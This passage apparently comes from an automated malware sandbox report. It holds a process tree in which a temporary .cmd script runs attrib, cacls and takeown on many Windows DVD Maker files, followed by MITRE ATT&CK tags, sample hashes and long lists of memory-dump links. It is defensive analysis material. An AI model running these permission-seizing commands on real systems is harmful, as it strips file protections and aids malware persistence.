  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\DVD Maker\Shared\DvdStyles\4to3Squareframe_VideoInset.png""
  2⤵
  PID:112
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\DVD Maker\Shared\DvdStyles\4to3Squareframe_VideoInset.png"
    3⤵
    PID:1036
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\DVD Maker\Shared\DvdStyles\4to3Squareframe_VideoInset.png" /E /G Admin:F /C
    3⤵
    PID:744
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\DVD Maker\Shared\DvdStyles\4to3Squareframe_VideoInset.png"
    3⤵
    PID:1920
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\babyblue.png""
  2⤵
  PID:1620
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\babyblue.png"
    3⤵
    PID:1972
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\babyblue.png" /E /G Admin:F /C
    3⤵
    PID:268
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\babyblue.png"
    3⤵
    PID:1992
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainBackground.wmv""
  2⤵
  PID:1216
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainBackground.wmv"
    3⤵
    PID:1624
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainBackground.wmv" /E /G Admin:F /C
    3⤵
    PID:332
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainBackground.wmv"
    3⤵
    PID:676
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainBackground_PAL.wmv""
  2⤵
  PID:1996
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainBackground_PAL.wmv"
    3⤵
    PID:1964
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainBackground_PAL.wmv" /E /G Admin:F /C
    3⤵
    PID:1484
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainBackground_PAL.wmv"
    3⤵
    PID:904
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainToNotesBackground.wmv""
  2⤵
  PID:1444
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainToNotesBackground.wmv"
    3⤵
    PID:1232
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainToNotesBackground.wmv" /E /G Admin:F /C
    3⤵
    PID:1940
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainToNotesBackground.wmv"
    3⤵
    PID:1700
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainToNotesBackground_PAL.wmv""
  2⤵
  PID:1956
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainToNotesBackground_PAL.wmv"
    3⤵
    PID:1696
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainToNotesBackground_PAL.wmv" /E /G Admin:F /C
    3⤵
    PID:600
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainToNotesBackground_PAL.wmv"
    3⤵
    PID:1192
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainToScenesBackground.wmv""
  2⤵
  PID:2020
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainToScenesBackground.wmv"
    3⤵
    - Views/modifies file attributes
    PID:1668
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainToScenesBackground.wmv" /E /G Admin:F /C
    3⤵
    PID:1388
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainToScenesBackground.wmv"
    3⤵
    PID:1948
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainToScenesBackground_PAL.wmv""
  2⤵
  PID:2008
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainToScenesBackground_PAL.wmv"
    3⤵
    PID:1276
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainToScenesBackground_PAL.wmv" /E /G Admin:F /C
    3⤵
    PID:1056
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainToScenesBackground_PAL.wmv"
    3⤵
    PID:1488
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyNotesBackground.wmv""
  2⤵
  PID:2040
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyNotesBackground.wmv"
    3⤵
    PID:816
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyNotesBackground.wmv" /E /G Admin:F /C
    3⤵
    PID:744
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyNotesBackground.wmv"
    3⤵
    PID:1920
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyNotesBackground_PAL.wmv""
  2⤵
  PID:1788
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyNotesBackground_PAL.wmv"
    3⤵
    PID:1812
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyNotesBackground_PAL.wmv" /E /G Admin:F /C
    3⤵
    PID:268
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyNotesBackground_PAL.wmv"
    3⤵
    PID:1992
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyScenesBackground.wmv""
  2⤵
  PID:2036
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyScenesBackground.wmv"
    3⤵
    PID:1108
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyScenesBackground.wmv" /E /G Admin:F /C
    3⤵
    PID:332
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyScenesBackground.wmv"
    3⤵
    PID:676
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyScenesBackground_PAL.wmv""
  2⤵
  PID:888
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyScenesBackground_PAL.wmv"
    3⤵
    PID:1452
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyScenesBackground_PAL.wmv" /E /G Admin:F /C
    3⤵
    PID:1484
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyScenesBackground_PAL.wmv"
    3⤵
    PID:904
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\LightBlueRectangle.PNG""
  2⤵
  PID:1100
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\LightBlueRectangle.PNG"
    3⤵
    PID:1412
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\LightBlueRectangle.PNG" /E /G Admin:F /C
    3⤵
    PID:1940
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\LightBlueRectangle.PNG"
    3⤵
    PID:1700
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\MainMenuButtonIcon.png""
  2⤵
  PID:1048
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\MainMenuButtonIcon.png"
    3⤵
    PID:1880
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\MainMenuButtonIcon.png" /E /G Admin:F /C
    3⤵
    PID:600
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\MainMenuButtonIcon.png"
    3⤵
    PID:1192
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\navSubpicture.png""
  2⤵
  PID:1984
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\navSubpicture.png"
    3⤵
    PID:1900
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\navSubpicture.png" /E /G Admin:F /C
    3⤵
    PID:1388
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\navSubpicture.png"
    3⤵
    PID:1948
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\nav_leftarrow.png""
  2⤵
  PID:1908
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\nav_leftarrow.png"
    3⤵
    PID:1692
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\nav_leftarrow.png" /E /G Admin:F /C
    3⤵
    PID:1056
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\nav_leftarrow.png"
    3⤵
    PID:1488
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\nav_rightarrow.png""
  2⤵
  PID:1952
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\nav_rightarrow.png"
    3⤵
    PID:1924
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\nav_rightarrow.png" /E /G Admin:F /C
    3⤵
    PID:744
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\nav_rightarrow.png"
    3⤵
    PID:1920
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\nav_uparrow.png""
  2⤵
  PID:1036
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\nav_uparrow.png"
    3⤵
    - Drops file in Program Files directory
    PID:748
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\nav_uparrow.png" /E /G Admin:F /C
    3⤵
    PID:268
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\nav_uparrow.png"
    3⤵
    PID:1992
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\16_9-frame-background.png""
  2⤵
  PID:1892
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\16_9-frame-background.png"
    3⤵
    PID:1852
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\16_9-frame-background.png" /E /G Admin:F /C
    3⤵
    PID:332
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\16_9-frame-background.png"
    3⤵
    PID:676

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Hidden Files and Directories

T1158

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Hidden Files and Directories

T1158

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd

MD5
6650ce31671b194e0f941868f2f3542f

SHA1
792a8fd0204ec0417f720a95a7cfd6286792d6dd

SHA256
bea908f559e636b7a4a693045bb957f1f9892204fb084d7aa411986b3386899b

SHA512
6eeb7a14d69b1ea6523bc7484777748f2e9f1b29be4802414a1a8806552bb1316021c977e7a3c79f8838f7a4692682ead66090d1692b2d102a91ee57a4d77b78

Download Submit
C:\Users\Admin\AppData\Local\Temp\foo\n383497fda5ca670a06dc688443c2011b.exe

MD5
383497fda5ca670a06dc688443c2011b

SHA1
c622ebf694003368c3246e166a3a7bfc6b787652

SHA256
d84d8ebcdfb0abcd821c24197517a5e329a1a6ae8e534509db78899b147cd60f

SHA512
5f1f854690f9743a09fcdd0b6be43fd09af3eb5bc0f1ee4c20659458e34f46c33eec8eb651e569315902d99a12a217e5dea750411effca79485fa343c24d0129

Download Submit
\Users\Admin\AppData\Local\Temp\foo\n383497fda5ca670a06dc688443c2011b.exe

MD5
383497fda5ca670a06dc688443c2011b

SHA1
c622ebf694003368c3246e166a3a7bfc6b787652

SHA256
d84d8ebcdfb0abcd821c24197517a5e329a1a6ae8e534509db78899b147cd60f

SHA512
5f1f854690f9743a09fcdd0b6be43fd09af3eb5bc0f1ee4c20659458e34f46c33eec8eb651e569315902d99a12a217e5dea750411effca79485fa343c24d0129

Download Submit
\Users\Admin\AppData\Local\Temp\foo\n383497fda5ca670a06dc688443c2011b.exe

MD5
383497fda5ca670a06dc688443c2011b

SHA1
c622ebf694003368c3246e166a3a7bfc6b787652

SHA256
d84d8ebcdfb0abcd821c24197517a5e329a1a6ae8e534509db78899b147cd60f

SHA512
5f1f854690f9743a09fcdd0b6be43fd09af3eb5bc0f1ee4c20659458e34f46c33eec8eb651e569315902d99a12a217e5dea750411effca79485fa343c24d0129

Download Submit
memory/108-1197-0x0000000000000000-mapping.dmp

Download
memory/108-1093-0x0000000000000000-mapping.dmp

Download
memory/108-1339-0x0000000000000000-mapping.dmp

Download
memory/108-831-0x0000000000000000-mapping.dmp

Download
memory/108-641-0x0000000000000000-mapping.dmp

Download
memory/108-1821-0x0000000000000000-mapping.dmp

Download
memory/108-1442-0x0000000000000000-mapping.dmp

Download
memory/108-1677-0x0000000000000000-mapping.dmp

Download
memory/108-800-0x0000000000000000-mapping.dmp

Download
memory/108-735-0x0000000000000000-mapping.dmp

Download
memory/108-1643-0x0000000000000000-mapping.dmp

Download
memory/108-495-0x0000000000000000-mapping.dmp

Download
memory/108-2382-0x0000000000000000-mapping.dmp

Download
memory/108-1715-0x0000000000000000-mapping.dmp

Download
memory/108-895-0x0000000000000000-mapping.dmp

Download
memory/108-2225-0x0000000000000000-mapping.dmp

Download
memory/112-38-0x0000000000000000-mapping.dmp

Download
memory/112-1828-0x0000000000000000-mapping.dmp

Download
memory/112-500-0x0000000000000000-mapping.dmp

Download
memory/112-1082-0x0000000000000000-mapping.dmp

Download
memory/112-320-0x0000000000000000-mapping.dmp

Download
memory/112-762-0x0000000000000000-mapping.dmp

Download
memory/112-1050-0x0000000000000000-mapping.dmp

Download
memory/112-672-0x0000000000000000-mapping.dmp

Download
memory/112-357-0x0000000000000000-mapping.dmp

Download
memory/112-953-0x0000000000000000-mapping.dmp

Download
memory/112-614-0x0000000000000000-mapping.dmp

Download
memory/112-1972-0x0000000000000000-mapping.dmp

Download
memory/112-1415-0x0000000000000000-mapping.dmp

Download
memory/112-1243-0x0000000000000000-mapping.dmp

Download
memory/112-1486-0x0000000000000000-mapping.dmp

Download
memory/112-529-0x0000000000000000-mapping.dmp

Download
memory/240-786-0x0000000000000000-mapping.dmp

Download
memory/240-308-0x0000000000000000-mapping.dmp

Download
memory/240-2333-0x0000000000000000-mapping.dmp

Download
memory/240-636-0x0000000000000000-mapping.dmp

Download
memory/240-132-0x0000000000000000-mapping.dmp

Download
memory/240-1898-0x0000000000000000-mapping.dmp

Download
memory/240-2150-0x0000000000000000-mapping.dmp

Download
memory/240-1484-0x0000000000000000-mapping.dmp

Download
memory/240-1413-0x0000000000000000-mapping.dmp

Download
memory/240-2296-0x0000000000000000-mapping.dmp

Download
memory/240-2078-0x0000000000000000-mapping.dmp

Download
memory/240-523-0x0000000000000000-mapping.dmp

Download
memory/240-417-0x0000000000000000-mapping.dmp

Download
memory/240-2259-0x0000000000000000-mapping.dmp

Download
memory/240-578-0x0000000000000000-mapping.dmp

Download
memory/240-664-0x0000000000000000-mapping.dmp

Download
memory/240-2222-0x0000000000000000-mapping.dmp

Download
memory/268-863-0x0000000000000000-mapping.dmp

Download
memory/268-959-0x0000000000000000-mapping.dmp

Download
memory/268-767-0x0000000000000000-mapping.dmp

Download
memory/268-991-0x0000000000000000-mapping.dmp

Download
memory/268-1562-0x0000000000000000-mapping.dmp

Download
memory/268-1663-0x0000000000000000-mapping.dmp

Download
memory/268-1215-0x0000000000000000-mapping.dmp

Download
memory/268-535-0x0000000000000000-mapping.dmp

Download
memory/268-2250-0x0000000000000000-mapping.dmp

Download
memory/268-2287-0x0000000000000000-mapping.dmp

Download
memory/268-1387-0x0000000000000000-mapping.dmp

Download
memory/268-1281-0x0000000000000000-mapping.dmp

Download
memory/268-2361-0x0000000000000000-mapping.dmp

Download
memory/268-1491-0x0000000000000000-mapping.dmp

Download
memory/268-1055-0x0000000000000000-mapping.dmp

Download
memory/268-2324-0x0000000000000000-mapping.dmp

Download
memory/268-927-0x0000000000000000-mapping.dmp

Download
memory/268-1023-0x0000000000000000-mapping.dmp

Download
memory/300-1764-0x0000000000000000-mapping.dmp

Download
memory/300-1090-0x0000000000000000-mapping.dmp

Download
memory/300-1390-0x0000000000000000-mapping.dmp

Download
memory/300-930-0x0000000000000000-mapping.dmp

Download
memory/300-209-0x0000000000000000-mapping.dmp

Download
memory/300-866-0x0000000000000000-mapping.dmp

Download
memory/300-709-0x0000000000000000-mapping.dmp

Download
memory/300-1058-0x0000000000000000-mapping.dmp

Download
memory/300-174-0x0000000000000000-mapping.dmp

Download
memory/300-1251-0x0000000000000000-mapping.dmp

Download
memory/300-898-0x0000000000000000-mapping.dmp

Download
memory/300-1798-0x0000000000000000-mapping.dmp

Download
memory/300-1424-0x0000000000000000-mapping.dmp

Download
memory/300-247-0x0000000000000000-mapping.dmp

Download
memory/300-1154-0x0000000000000000-mapping.dmp

Download
memory/300-834-0x0000000000000000-mapping.dmp

Download
memory/316-0-0x000000000253C000-0x000000000253D000-memory.dmp

Filesize
4KB

Download
memory/328-1923-0x0000000000000000-mapping.dmp

Download
memory/328-2211-0x0000000000000000-mapping.dmp

Download
memory/328-2248-0x0000000000000000-mapping.dmp

Download
memory/328-2067-0x0000000000000000-mapping.dmp

Download
memory/328-2285-0x0000000000000000-mapping.dmp

Download
memory/332-2043-0x0000000000000000-mapping.dmp

Download
memory/332-1627-0x0000000000000000-mapping.dmp

Download
memory/332-931-0x0000000000000000-mapping.dmp

Download
memory/332-1284-0x0000000000000000-mapping.dmp

Download
memory/332-1420-0x0000000000000000-mapping.dmp

Download
memory/332-1800-0x0000000000000000-mapping.dmp

Download
memory/332-995-0x0000000000000000-mapping.dmp

Download
memory/332-2151-0x0000000000000000-mapping.dmp

Download
memory/332-1027-0x0000000000000000-mapping.dmp

Download
memory/332-82-0x0000000000000000-mapping.dmp

Download
memory/332-299-0x0000000000000000-mapping.dmp

Download
memory/332-155-0x0000000000000000-mapping.dmp

Download
memory/332-2007-0x0000000000000000-mapping.dmp

Download
memory/332-1059-0x0000000000000000-mapping.dmp

Download
memory/332-771-0x0000000000000000-mapping.dmp

Download
memory/332-963-0x0000000000000000-mapping.dmp

Download
memory/332-1834-0x0000000000000000-mapping.dmp

Download
memory/332-117-0x0000000000000000-mapping.dmp

Download
memory/332-1123-0x0000000000000000-mapping.dmp

Download
memory/332-867-0x0000000000000000-mapping.dmp

Download
memory/332-1661-0x0000000000000000-mapping.dmp

Download
memory/368-937-0x0000000000000000-mapping.dmp

Download
memory/368-901-0x0000000000000000-mapping.dmp

Download
memory/368-2385-0x0000000000000000-mapping.dmp

Download
memory/368-2274-0x0000000000000000-mapping.dmp

Download
memory/368-673-0x0000000000000000-mapping.dmp

Download
memory/368-1515-0x0000000000000000-mapping.dmp

Download
memory/368-1831-0x0000000000000000-mapping.dmp

Download
memory/368-1901-0x0000000000000000-mapping.dmp

Download
memory/368-2311-0x0000000000000000-mapping.dmp

Download
memory/368-431-0x0000000000000000-mapping.dmp

Download
memory/368-203-0x0000000000000000-mapping.dmp

Download
memory/368-1975-0x0000000000000000-mapping.dmp

Download
memory/368-1687-0x0000000000000000-mapping.dmp

Download
memory/368-1337-0x0000000000000000-mapping.dmp

Download
memory/368-1238-0x0000000000000000-mapping.dmp

Download
memory/368-2348-0x0000000000000000-mapping.dmp

Download
memory/368-1586-0x0000000000000000-mapping.dmp

Download
memory/368-2121-0x0000000000000000-mapping.dmp

Download
memory/368-1034-0x0000000000000000-mapping.dmp

Download
memory/368-1793-0x0000000000000000-mapping.dmp

Download
memory/368-1410-0x0000000000000000-mapping.dmp

Download
memory/368-865-0x0000000000000000-mapping.dmp

Download
memory/368-829-0x0000000000000000-mapping.dmp

Download
memory/368-1940-0x0000000000000000-mapping.dmp

Download
memory/388-63-0x0000000000000000-mapping.dmp

Download
memory/388-237-0x0000000000000000-mapping.dmp

Download
memory/388-317-0x0000000000000000-mapping.dmp

Download
memory/388-434-0x0000000000000000-mapping.dmp

Download
memory/432-816-0x0000000000000000-mapping.dmp

Download
memory/432-1628-0x0000000000000000-mapping.dmp

Download
memory/432-1729-0x0000000000000000-mapping.dmp

Download
memory/432-1418-0x0000000000000000-mapping.dmp

Download
memory/432-945-0x0000000000000000-mapping.dmp

Download
memory/432-2053-0x0000000000000000-mapping.dmp

Download
memory/432-2169-0x0000000000000000-mapping.dmp

Download
memory/432-1767-0x0000000000000000-mapping.dmp

Download
memory/432-1279-0x0000000000000000-mapping.dmp

Download
memory/432-1594-0x0000000000000000-mapping.dmp

Download
memory/432-1523-0x0000000000000000-mapping.dmp

Download
memory/432-751-0x0000000000000000-mapping.dmp

Download
memory/472-2013-0x0000000000000000-mapping.dmp

Download
memory/472-1480-0x0000000000000000-mapping.dmp

Download
memory/472-1409-0x0000000000000000-mapping.dmp

Download
memory/472-2366-0x0000000000000000-mapping.dmp

Download
memory/472-16-0x0000000000000000-mapping.dmp

Download
memory/472-447-0x0000000000000000-mapping.dmp

Download
memory/484-1530-0x0000000000000000-mapping.dmp

Download
memory/484-1979-0x0000000000000000-mapping.dmp

Download
memory/484-1802-0x0000000000000000-mapping.dmp

Download
memory/484-2322-0x0000000000000000-mapping.dmp

Download
memory/484-1905-0x0000000000000000-mapping.dmp

Download
memory/484-1322-0x0000000000000000-mapping.dmp

Download
memory/484-1944-0x0000000000000000-mapping.dmp

Download
memory/484-2089-0x0000000000000000-mapping.dmp

Download
memory/484-1768-0x0000000000000000-mapping.dmp

Download
memory/484-2359-0x0000000000000000-mapping.dmp

Download
memory/484-2396-0x0000000000000000-mapping.dmp

Download
memory/484-1459-0x0000000000000000-mapping.dmp

Download
memory/524-1590-0x0000000000000000-mapping.dmp

Download
memory/524-15-0x0000000000000000-mapping.dmp

Download
memory/524-1116-0x0000000000000000-mapping.dmp

Download
memory/524-1519-0x0000000000000000-mapping.dmp

Download
memory/524-823-0x0000000000000000-mapping.dmp

Download
memory/524-1309-0x0000000000000000-mapping.dmp

Download
memory/524-727-0x0000000000000000-mapping.dmp

Download
memory/524-605-0x0000000000000000-mapping.dmp

Download
memory/524-792-0x0000000000000000-mapping.dmp

Download
memory/524-2161-0x0000000000000000-mapping.dmp

Download
memory/524-1382-0x0000000000000000-mapping.dmp

Download
memory/524-887-0x0000000000000000-mapping.dmp

Download
memory/536-1169-0x0000000000000000-mapping.dmp

Download
memory/536-1785-0x0000000000000000-mapping.dmp

Download
memory/536-1679-0x0000000000000000-mapping.dmp

Download
memory/536-1932-0x0000000000000000-mapping.dmp

Download
memory/536-1893-0x0000000000000000-mapping.dmp

Download
memory/536-2002-0x0000000000000000-mapping.dmp

Download
memory/536-593-0x0000000000000000-mapping.dmp

Download
memory/536-1823-0x0000000000000000-mapping.dmp

Download
memory/536-1405-0x0000000000000000-mapping.dmp

Download
memory/536-2384-0x0000000000000000-mapping.dmp

Download
memory/536-2077-0x0000000000000000-mapping.dmp

Download
memory/536-806-0x0000000000000000-mapping.dmp

Download
memory/536-2347-0x0000000000000000-mapping.dmp

Download
memory/536-1476-0x0000000000000000-mapping.dmp

Download
memory/536-2310-0x0000000000000000-mapping.dmp

Download
memory/536-1967-0x0000000000000000-mapping.dmp

Download
memory/556-820-0x0000000000000000-mapping.dmp

Download
memory/556-755-0x0000000000000000-mapping.dmp

Download
memory/556-17-0x0000000000000000-mapping.dmp

Download
memory/556-1142-0x0000000000000000-mapping.dmp

Download
memory/556-1408-0x0000000000000000-mapping.dmp

Download
memory/556-1206-0x0000000000000000-mapping.dmp

Download
memory/556-1688-0x0000000000000000-mapping.dmp

Download
memory/556-629-0x0000000000000000-mapping.dmp

Download
memory/556-1272-0x0000000000000000-mapping.dmp

Download
memory/556-1617-0x0000000000000000-mapping.dmp

Download
memory/556-691-0x0000000000000000-mapping.dmp

Download
memory/556-2112-0x0000000000000000-mapping.dmp

Download
memory/556-1654-0x0000000000000000-mapping.dmp

Download
